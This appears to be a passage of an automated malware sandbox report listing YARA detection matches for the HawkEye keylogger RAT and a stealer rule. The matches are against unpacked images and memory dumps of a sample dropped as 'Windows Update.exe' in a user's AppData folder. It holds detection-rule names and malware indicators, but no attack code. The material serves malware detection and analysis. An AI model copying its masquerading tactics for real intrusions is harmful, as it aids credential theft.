          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2128
          Source: 5.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Windows Update.exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: WindowsUpdate.exe.10.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 5.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.75c0000.20.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
